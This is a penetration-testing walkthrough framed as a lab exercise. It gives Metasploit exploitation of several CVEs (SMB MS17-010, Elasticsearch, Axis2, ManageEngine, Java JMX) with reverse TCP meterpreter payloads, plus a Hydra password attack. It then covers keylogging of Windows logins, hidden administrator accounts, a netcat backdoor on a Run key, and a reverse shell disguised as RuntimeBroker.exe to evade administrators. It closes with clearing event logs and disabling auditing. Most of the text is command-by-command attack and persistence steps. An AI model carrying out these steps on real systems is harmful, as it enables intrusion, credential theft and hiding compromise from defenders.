To conduct an effective penetration testing, proposing a framework and list the suitable tools and techniques under each phase and follow the framework is the best method because, during the penetration testing, it is easy to choose the best tool and technique for each phase. This guide shows the attack phase of the penetration testing. Attack phase has following phases. Those are reconnaissance, scanning, getting access, maintaining access and covering tracks.
1. Intelligence gathering:
In this phase, a pen tester learns about how the target machine operates,
behaves and information about the system such as running services, operating
system and service versions using scanning tools like Nmap.
Running
services and service version and operating system have been collected using
Nmap
Type sudo nmap -sV -version-intensity 9 172.28.128.3
--version-intensity 9 is assigning value 9 for all probe packets, thus increases version detection for uncommon applications.
1.1 Find vulnerabilities using social engineering:
Once running services and versions are identified, pen tester can use:
Microsoft Security Response Center's security bulletins.
Exploit database: It contains exploit code for the vulnerability. This exploit code can be executed directly from the terminal or executed from the Metasploit tool. To import to the Metasploit tool, ruby code file (exploit.rb) should be placed under the exploit folder in the Metasploit tool. Finally, we do need to reload the Metasploit by typing reload_all.
CVE details website: It has listed multi vendors product's vulnerabilities.
SPLOITUS search engine: it will provide appropriate tools and exploits based on the keyword.
1.2 Vulnerability scanning:
In vulnerability scanning phase, the target system will be scanned with popular tools like Nessus, open vas, Nexpose. They keep the vulnerability database to detect the system vulnerabilities. OpenVAS has been used to find the vulnerabilities of the windows server 200.
2.Exploitation
In this phase, the pen tester will exploit the vulnerability that existed in the system with the help of varieties of tools and techniques. Tools:- Metasploit framework, core impact, canvas, sqlmap, and using exploit code found in the exploit-db.com
2.1 Exploit Using Microsoft Windows SMB Server CVE-2017-0143 Remote Code Execution Vulnerability
Open terminal and Start PostgreSQL database by typing service PostgreSQL start. Initialize Metasploit framework by typing msfconsole. Find exploit by typing search cve:2017-0143.
Select suitable exploit by typing use and copy and paste it as shown below then press enter. Type show options command and press enter to display the required parameters to be set to successful exploitation.
Set remote host by typing set rhost 172.28.128.3. Set localhost by typing set lhost 172.28.128.4 . Localhost is attacker pc that listens for inbound connection when reverse TCP shell payload is used. Type show payloads command to display all available payloads.
Set suitable payload by typing set payload and copy and paste it as shown below. Note: the meterpreter shell has more options to control the compromised host. Reverse TCP is used instead of bind TCP because to bypass the firewall by asking the compromised host to initiate the TCP connection (outbound flow is allowed by the firewall by default). Finally type run command to start the exploitation process.
Successfully exploited and Meterpreter session is opened.
2.2 Exploit Using Elastic Search Code Execution Vulnerability
Initialize MSF console and type search cve:2014-3120. Select suitable exploit and type use exploit/multi/elasticsearch/script_mvel_rce and press enter Type show options.
Type the following commands Set rhost 172.28.128.3 Set lhost 172.28.128.4 Show payloads Set payload java/meterpreter/reverse_tcp run
2.3 Exploit Using Axis2 Default Administrator Password Vulnerability
The axis2 administrator account has the default password, it can be found in the vendor website otherwise Online dictionary attack can be launch.
To start dictionary attack type Hydra -s 8282 -v -V -L /home/subaharan/Desktop/us.txt -P /home/subaharan/Desktop/pass.txt 172.28.128.3 HTTP-post-form "/axis2/axis2 -admin/login:username=^USER^&password=^PASS^&submit=+Login+:Invalid auth credentials!" and press enter.
-s -service port, -V -verbose, -L- location of the username list
file, -P -location of the password list file, 172.28.128.3 is
the IP address of the target, HTTP-post-form - HTTP method that needs
to be used, /axis2/axis2-admin -location of the HTTP login form.
/login:username=^USER^&password=^PASS^ &submit=+Login+ - body
of the HTTP post method. Invalid auth credentials! -error message.
Type search cve:2010-0219 Type use exploit/multi/http/axis2_deployer
Type set rhost 172.28.128.3 Type set lhost 172.28.128.4 Type set rport 8282 Type show payloads Type set payload java/meterpreter/reverse_tcp
Type run
2.4 Exploit Using ManageEngine Desktop Central 9 Fileuploadservlet Connectionid Vulnerability
Type search cve:2015-8249 Type use exploit/windows/http/manageengine_connectionid_write Type show options
Type set rhost 172.28.128.3 Type set lhost 172.28.128.4 Type show payloads
Type Set payload windows/meterpretor/reverse_tcp Type run
2.5 Exploit Using Java JMX Server Insecure Configuration Java Code Execution
Type search:2015-2342 Type use exploit/multi/misc/java_jmx_server Type show options
Type set rhost 172.28.128.3 Type srvhost 172.28.128.4 Type set rport 1617 Type show payloads Type set payload java/meterpreter/reverse_tcp
Type run
3. Maintaining access
In this phase penetration tester will keyloggers, backdoors, etc for later
system access.
Tools- Netcat, Metasploit, Power spy
3.1 Enabling keylogger function to maintain access
Type ps to list the running process on the target.
To capture the windows login username and password, the running code should be moved to winlogon.exe process. Type migrate 412 Type getpid to verify Type keyscan_start to start the capturing process. Type keyscan_dump to extract the captured data.
3.2 Create a new account to maintaining access.
Type shell to open the windows shell. Type net user /add suba suba12345 to create a new user account. Type netlocalgroup administrators suba /add to add the user Suba to administrators group so that user can have full power to execute any tasks
Open the new terminal and type ssh -l suba 172.28.128.3 to access the target host via ssh. -l means username for ssh. 172.28.128.3 is the IP address of the target host.
3.3 Create a hidden user account and enable remote desktop protocol for maintain access.
Type shell Type net user suba12 suba12345 /add Type net localgroup "Administrators" /add suba12 Type net localgroup "Users" /del suba12 to delete suba12 from Users group
Type reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v suba12 /t REG_DWORD /d 0 /f to add the user suba12 to a special account list /v -name of the key /t -data type of the key /d -value of the key /f -add the registry key without prompting confirmation.
Type reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v dontdisplaylastusername /t REG_DWORD /d 1 /f to Hide the user name
Type reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f to enable the remote desktop protocol.
Type reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\winstations\rdp-tcp" /v PortNumber /t REG_DWORD /d 0x4B2 /f to change from default tcp port to port 1202. So that administrators may think rdp is not running.
Type netsh advfirewall firewall add rule name="Open Port 1202" dir=in action=allow protocol=TCP localport=1202 to Add a rule in the windows firewall to allow inbound connection to the new port 1202.
Type net stop termservice to stop terminal service.
Type net start termservice to start terminal service .
Finally, install Rdesktop utility by typing sudo apt install rdesktop .
Connect to the target by typing rdesktop -u suba12 172.28.128.3:1202 1202 is the new TCP port that RDP is listening .
3.4 Upload Netcat as a backdoor for maintain access.
Meterpreter shell has file uploading ability based on the vulnerability. Type upload /home/subaharan/Desktop/netcat-win32-1.12/nc64.exe C:\\windows\\system32 The first argument is the location of the file that needs to be uploaded and second is the directory in the target.
Type reg enumkey -k HKLM\\SOFTWARE\\MICROSOFT\\CURRENTVERSION\\RUN to view the keys present in the above directory. These processes will start automatically during system booting.
Type reg setval -k HKLM\\Software\\Microsoft\\Windows\\Currentversion\\run -V nc -d "C:\Windows\System32\nc64.exe -ldp 455 -e cmd.exe" to make the netcat to automatically start during system startup. 445 is a port that netcat is listening for an inbound connection. -e allows executing the parameter with the full path to the netcat.
Type reg queryval -k HKLM\\Software\\Microsoft\\Windows\\Currentversion\\run to verify that the key has been added successfully.
Type shell to access windows command shell. Type netsh advfirewall firewall add rule name=" open port 455" dir=in action =allow protocol=TCP localport=455 to allow inbound connection to TCP port 455. dir is the direction whether it's inbound or outbound
Finally, open a new terminal and type nc -v 172.28.128.3 455 to connect to the target host and get shell access. 455 is the port that Netcat is listening. -v is to enable verbosely.
3.5 Install a persistent reverse tcp client for maintain access.
Type upload "home/subaharan/Desktop/RuntimeBroker.exe" c:\\windows to upload the Runtimebroker.exe file to the target. This is a reverse TCP shell client. RuntimeBroker name has been given to avoid detection from IT administrators.
Type shell to access windows shell prompt. Type reg add HKLM\software\microsoft\windows\currentversion\run /v RuntimeBroker /t REG_SZ /d "c:\windows\RuntimeBroker.exe" /f to add a registry key so that it will be start automatically during system reboot.
Type C:\windows\RuntimeBroker.exe to execute the reverse TCP shell client. This program is designed to send a TCP syn request to the reverse TCP shell server, if the server is not enabled then the program will stay sleep for the defined time and then again send a sync request to the server until the server is available.
Type tasklist to list the running process on the remote target.
Open new terminal and type python '/home/subaharan/Desktop/Server-TCPReverse Shell.py' to run the reverse TCP shell server. Below figure shows that TCP syn request did come from the client and shell access has been established.
Metasploit can also be used as reverse TCP shell server. Type use exploit/multi/handler Type set lhost 172.28.128.4 to set the local host IP address Type set lport 4000 to listen to the server on TCP port 4000 Type set payload python/shell_reverse_tcp Type run
4 Cover tracks
In this phase, pentester will clear the evidence that created during
hacking.
Tools- Auditpol, EventViewer, Metasploit
4.1 Clear windows logs from Meterpreter Shell
Type clearv to remove logging records.
4.2 Turn off windows auditing for covering tracks
Type shell to access windows shell. Type auditpol /clear to stop the windows auditing.
Type auditpol /get /category:* to verify whether the auditing is stopped.
4.3 Clear windows logs from the windows shell for cover tracks
Issue shell command from Meterpreter shell to migrate to windows shell. Type wevtutil enum-logs to enumerate the events.
To clear the logs, type the following commands one by one Wevtutil clear-log application Wevtutil clear-log security Wevtutil clear-log setup Wevtutil clear-log system
